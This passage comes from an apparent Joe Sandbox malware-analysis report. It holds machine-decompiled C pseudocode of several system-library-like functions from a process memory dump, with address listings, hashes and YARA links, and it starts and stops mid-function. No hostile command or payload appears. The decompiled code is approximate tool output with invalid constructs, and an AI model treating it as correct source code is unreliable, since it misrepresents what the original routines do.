								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E036FDFDF(_t91, 1, _t142);
					}
					return E0371D0D1(_t103);
				}
			}

0x03791d55
0x03791d55
0x03791d57
0x03791d5c
0x03791d63
0x03791d66
0x03791d69
0x03791d6c
0x03791d6e
0x03791d71
0x03791d74
0x03791d77
0x03791d7a
0x03791d7d
0x03791d82
0x03791d85
0x03791d88
0x03791d8d
0x03791d90
0x03791d94
0x03791d96
0x03791d98
0x03791d98
0x03791d9b
0x03791d9e
0x00000000
0x03791da1
0x03791da5
0x03791e78
0x03791e78
0x03791e82
0x03791e87
0x03791e8a
0x03791e8d
0x03791e92
0x03791e95
0x03791e98
0x03791e9b
0x03791ede
0x03791ee3
0x03791ee8
0x03791ef2
0x03791ef2
0x03791ef5
0x03791ef8
0x03791efe
0x03791f03
0x00000000
0x03791f09
0x03791f0c
0x03791f0e
0x03791f11
0x00000000
0x03791f17
0x03791f17
0x03791f1a
0x03791f31
0x03791f34
0x03791f3f
0x03791f42
0x03791f45
0x03791f47
0x03791f4a
0x03791f4d
0x03791f4f
0x03791f63
0x03791f65
0x03791f67
0x00000000
0x03791f69
0x03791f69
0x03791f72
0x03791f72
0x03791f75
0x03791f77
0x00000000
0x00000000
0x03791f6e
0x03791f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03791f70
0x03791f83
0x03791f83
0x03791f85
0x00000000
0x03791f85
0x03791f51
0x03791f53
0x03791f5a
0x03791f5c
0x03791f87
0x03791f87
0x03791f87
0x03791f8b
0x03791f8d
0x03791f90
0x00000000
0x03791f90
0x03791f1c
0x03791f1c
0x00000000
0x03791f22
0x03791f22
0x03791f25
0x03791f28
0x03791f97
0x03791f97
0x03791f9d
0x03791fa7
0x03791faa
0x03791fb1
0x03791fb9
0x03791fbd
0x03791fbe
0x03791fc0
0x03791f2a
0x03791f93
0x03791f93
0x03791f95
0x00000000
0x00000000
0x00000000
0x00000000
0x03791f95
0x03791f28
0x03791f1c
0x03791f1a
0x03791f11
0x03791e9d
0x03791ea0
0x03791eae
0x03791eb4
0x03791ebc
0x03791ebc
0x03791ec2
0x03791ec8
0x03791ecd
0x00000000
0x03791ed3
0x03791ed3
0x00000000
0x03791ed3
0x03791ecd
0x03791dab
0x03791dab
0x03791db1
0x03791db3
0x03791db9
0x03791dbf
0x03791dc2
0x03791dda
0x03791ddd
0x03791de0
0x03791de9
0x03791dec
0x03791def
0x03791df1
0x03791df3
0x03791e0a
0x03791e0c
0x03791e0e
0x00000000
0x03791e10
0x03791e10
0x03791e13
0x03791e16
0x03791e16
0x03791e19
0x03791e1c
0x03791e1e
0x03791e20
0x00000000
0x00000000
0x03791e22
0x03791e24
0x00000000
0x03791e26
0x00000000
0x03791e26
0x00000000
0x03791e24
0x03791e30
0x03791e30
0x00000000
0x03791e30
0x03791df5
0x03791df7
0x03791e01
0x03791e32
0x03791e34
0x03791e36
0x00000000
0x03791e36
0x03791dc4
0x03791dc4
0x00000000
0x03791dc6
0x03791dc6
0x03791dc9
0x03791dcf
0x03791dd1
0x03791e38
0x03791e38
0x03791e38
0x03791e38
0x03791dc4
0x03791dbb
0x03791dbb
0x03791dbb
0x03791dbb
0x03791e3a
0x03791e3a
0x03791e3d
0x03791e40
0x03791e43
0x03791e6f
0x03791fc7
0x03791fc7
0x03791e75
0x03791e75
0x00000000
0x03791e75
0x03791e6f
0x03791fca
0x03791fca
0x03791fce
0x03791fd0
0x03791fd0
0x03791fd3
0x03791fd9
0x03791fde
0x03791fe4
0x03791fe4
0x03791fee
0x03791fee

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583362a6590c9c115a6f630a3ae437eaf0e13d3201a73e70d38ac65bebfbedb1
Instruction ID: 2d850bfa55af29867a9f32b67c2af15cb0c303386b0168e34f8d9b26aa38e241
Opcode Fuzzy Hash: 583362a6590c9c115a6f630a3ae437eaf0e13d3201a73e70d38ac65bebfbedb1
Instruction Fuzzy Hash: 49816C75E0121ACFEF18CFA8D8809ECB7B2BF49314B58436AE412AB3D5DB319955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 036CC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E036CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x37bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E036D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0370B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x37b7b9c; // 0x0
					_t74 = L036E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03709650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L036E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0370F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E037013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L036E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03709650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x036cc608
0x036cc615
0x036cc625
0x036cc62d
0x036cc635
0x036cc640
0x036cc680
0x036cc687
0x036cc688
0x036cc689
0x036cc694
0x036cc694
0x036cc642
0x036cc64a
0x036cc697
0x03737a25
0x03737a2b
0x03737a2e
0x03737a30
0x03737bea
0x03737bea
0x00000000
0x03737bea
0x03737a36
0x03737a43
0x03737a48
0x03737a4c
0x03737a4e
0x00000000
0x00000000
0x03737a58
0x03737a5a
0x03737a5b
0x03737a5c
0x03737a5d
0x03737a63
0x03737a64
0x03737a6a
0x03737a6c
0x03737a6e
0x037379cb
0x037379cb
0x037379ce
0x037379d0
0x03737a98
0x03737a9b
0x03737a9b
0x03737a9e
0x03737aa1
0x03737bbe
0x03737bbe
0x03737bc0
0x03737be0
0x03737be0
0x03737a01
0x03737a01
0x03737a05
0x03737a07
0x03737a15
0x03737a15
0x03737a1a
0x00000000
0x03737a1a
0x03737bc2
0x03737bc6
0x03737bc9
0x03737bcd
0x03737bcf
0x037379e6
0x037379e6
0x037379eb
0x037379eb
0x037379ef
0x037379f1
0x00000000
0x00000000
0x037379f3
0x037379f5
0x037379ff
0x037379ff
0x00000000
0x037379ff
0x037379f7
0x037379fd
0x00000000
0x00000000
0x00000000
0x037379fd
0x03737bd5
0x03737bd8
0x00000000
0x00000000
0x03737ba9
0x03737bac
0x03737bb0
0x03737bb1
0x03737bb1
0x03737bb6
0x00000000
0x03737bb6
0x03737aa7
0x03737aaa
0x00000000
0x00000000
0x03737ab2
0x03737ab3
0x03737ab5
0x03737aec
0x03737aef
0x03737b25
0x03737b28
0x03737b62
0x03737b64
0x03737b8f
0x03737b92
0x03737b96
0x03737b98
0x00000000
0x00000000
0x03737b9e
0x03737b9f
0x03737ba3
0x00000000
0x03737ba3
0x03737b66
0x03737b68
0x03737ae2
0x03737ae2
0x00000000
0x03737ae2
0x03737b6e
0x03737b72
0x03737b75
0x03737b81
0x03737b85
0x03737b87
0x00000000
0x00000000
0x03737b31
0x03737b34
0x03737b3c
0x03737b45
0x03737b46
0x03737b4f
0x03737b51
0x03737b57
0x03737b59
0x03737b59
0x00000000
0x03737b59
0x03737b77
0x00000000
0x03737b77
0x03737b2a
0x00000000
0x03737b2a
0x03737af1
0x03737af3
0x00000000
0x00000000
0x03737afb
0x03737afc
0x03737afe
0x00000000
0x00000000
0x03737b00
0x03737b03
0x00000000
0x00000000
0x03737b05
0x03737b09
0x03737b0d
0x03737b0f
0x00000000
0x00000000
0x03737b18
0x03737b1d
0x00000000
0x03737b1d
0x03737ab7
0x03737ab9
0x00000000
0x00000000
0x03737abf
0x03737ac1
0x00000000
0x00000000
0x03737ac3
0x03737ac6
0x00000000
0x00000000
0x03737ac8
0x03737acc
0x03737ad0
0x03737ad2
0x00000000
0x00000000
0x03737adb
0x00000000
0x03737adb
0x037379d6
0x037379d9
0x037379dc
0x03737a91
0x03737a94
0x00000000
0x03737a94
0x037379e2
0x00000000
0x037379e2
0x03737a74
0x03737a7a
0x00000000
0x00000000
0x03737a8a
0x03737a21
0x03737a21
0x00000000
0x03737a21
0x036cc650
0x036cc651
0x036cc656
0x036cc65c
0x036cc65d
0x036cc663
0x036cc664
0x036cc66a
0x036cc66e
0x037379c5
0x037379c7
0x00000000
0x037379c7
0x036cc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e260e20a937b6a77be8f745e4595e9b41d98e10454cf15786b5898eafc9e54
Instruction ID: 1c3e0a4510b9185d17686c701e32dd661725c66d1ca487d625a8effb9cb1c4a4
Opcode Fuzzy Hash: 48e260e20a937b6a77be8f745e4595e9b41d98e10454cf15786b5898eafc9e54
Instruction Fuzzy Hash: C88192B56043859BCB29CF18C880B7BB3E8EB86350F18496EED459B642D331DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 037803DA Relevance: .2, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E037803DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x37b634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x37b6348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E0378BBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E036E2280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					E036DFFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						E0378BCD2(_t178,  *0x37b6348,  *0x37b634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E036FF3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E03780150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E03780180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}

0x037803e5
0x037803eb
0x037803ed
0x037803ef
0x037803f5
0x037803f8
0x037803fc
0x037803ff
0x03780404
0x03780406
0x0378040b
0x03780619
0x03780619
0x03780414
0x03780417
0x0378041b
0x0378041e
0x03780421
0x0378042c
0x03780436
0x03780438
0x0378043b
0x03780440
0x03780448
0x0378058e
0x03780596
0x0378059b
0x037805a0
0x037805a3
0x037805d1
0x037805d6
0x037805d9
0x037805dc
0x037805e2
0x037805e4
0x037805e7
0x037805e9
0x037805eb
0x037805f1
0x037805f4
0x037805fb
0x0378060b
0x0378060b
0x00000000
0x03780610
0x03780450
0x03780458
0x0378045f
0x00000000
0x00000000
0x03780465
0x0378046b
0x0378046f
0x0378046f
0x03780472
0x03780478
0x0378047d
0x0378047f
0x03780484
0x0378061c
0x03780622
0x00000000
0x00000000
0x03780628
0x0378062c
0x00000000
0x0378048a
0x0378048a
0x0378048a
0x0378048f
0x037804a2
0x037804a9
0x037804ab
0x037804ab
0x037804ad
0x037804b3
0x037804b8
0x037804bb
0x037804c1
0x037804c6
0x037804ca
0x037804cc
0x037804dd
0x037804e6
0x037804e8
0x037804f1
0x037804f4
0x03780568
0x0378056b
0x03780571
0x03780577
0x03780579
0x0378057c
0x03780581
0x03780583
0x03780586
0x0378058b
0x0378058b
0x00000000
0x00000000
0x00000000
0x00000000
0x037804f6
0x037804f6
0x037804f6
0x037804f9
0x037804fc
0x037804fc
0x037804ff
0x03780505
0x00000000
0x00000000
0x03780509
0x0378050f
0x03780532
0x03780542
0x03780544
0x0378054a
0x0378054c
0x0378054f
0x03780552
0x03780552
0x03780557
0x0378055a
0x0378055b
0x03780564
0x00000000
0x037804ce
0x037804ce
0x037804d0
0x037804d3
0x037804d3
0x037804d4
0x037804d6
0x037804d9
0x00000000
0x037804d3
0x037804cc
0x03780491
0x03780496
0x0378049d
0x037804a0
0x00000000
0x00000000
0x00000000
0x00000000
0x03780498
0x03780498
0x03780498
0x03780499
0x03780499
0x00000000
0x03780498

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07cccb9488f959645eb6e2c68fdb93547238735a5fa02db8aa2a95d8f7d19afb
Instruction ID: 9599aa9bcaad024090969ac4a9830ffd9fee748cf9f13a97c746c3e2350781b1
Opcode Fuzzy Hash: 07cccb9488f959645eb6e2c68fdb93547238735a5fa02db8aa2a95d8f7d19afb
Instruction Fuzzy Hash: B971D372E40215ABDB18DF58C880B6DFBF6EF89310F188269D815AF385D735E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0378D616 Relevance: .2, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E0378D616(signed int __ecx, intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed char _t86;
				signed int _t88;
				void* _t91;
				signed int _t94;
				signed int _t95;
				unsigned int _t96;
				signed int _t110;
				signed char _t118;
				intOrPtr _t120;
				signed int _t123;
				signed int _t124;
				signed char _t131;
				signed int _t133;
				signed int _t137;
				signed char _t147;
				signed int _t153;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t164;
				signed int _t169;
				signed int _t173;

				_v8 =  *0x37bd360 ^ _t173;
				_t120 = __edx;
				_t159 = __ecx;
				_v40 = __edx;
				_t150 =  *(__edx + 1) & 0x000000ff;
				_t174 =  *0x37b610c & 0x00000001;
				_t160 = 0;
				_v24 = 0;
				_v28 =  *(0x36aaef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
				if(( *0x37b610c & 0x00000001) == 0) {
					_v12 = 0;
				} else {
					_v12 = E0378C70A(__ecx + 0x38, _t150);
				}
				_t79 = E0378C5FF(_t120, 0, _t174);
				_t153 = _t79 * _v28;
				_v36 = _t153;
				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
				_t86 = E0378A359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
				_t131 = _t86;
				_v16 = _t86;
				if(_t131 <= 0xc) {
					_t131 = 0xc;
					_v16 = _t131;
				}
				_t123 = 1 << _t131;
				_v20 = 1;
				if(( *0x37b610c & 0x00000008) == 0) {
					L11:
					_t88 = 1;
					__eflags = 1;
					L12:
					_t133 = _a4 & _t88;
					_v32 = _t133;
					if(_t133 == 0) {
						L036EFAD0(_t159 + 0x34);
					}
					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
					_t91 = 0;
					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
						_t124 = 0;
					} else {
						_t124 = E036F1710(_t134);
						_t91 = 0;
					}
					if(_t124 != 0) {
						_t94 = 1 <<  *(_t124 + 0x1c);
						__eflags = 1;
						goto L22;
					} else {
						 *0x37bb1e0( *_t159, _v20, _t91, _a4);
						_t124 =  *( *(_t159 + 4) ^  *0x37b6110 ^ _t159)();
						if(_t124 != 0) {
							_t94 = 0;
							_t160 = 0;
							L22:
							__eflags =  *0x37b610c & 0x00000002;
							_v16 = _t94;
							if(( *0x37b610c & 0x00000002) == 0) {
								L25:
								_t95 = E0378D597(_v20, _v28);
								_t156 = _t95;
								_v12 = _t95;
								L26:
								_t96 = _v16;
								__eflags = _t96;
								if(_t96 != 0) {
									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
									if( *((char*)(_t124 + 0x1d)) > 1) {
										_t169 = _t96 >> 0xc;
										__eflags = _t169;
										_t160 =  ~_t169;
										_v24 = _t160;
									}
								}
								__eflags = _t96 - _t156;
								if(_t96 >= _t156) {
									L33:
									_t137 = _v20;
									__eflags = _t156 - _t137;
									if(_t156 != _t137) {
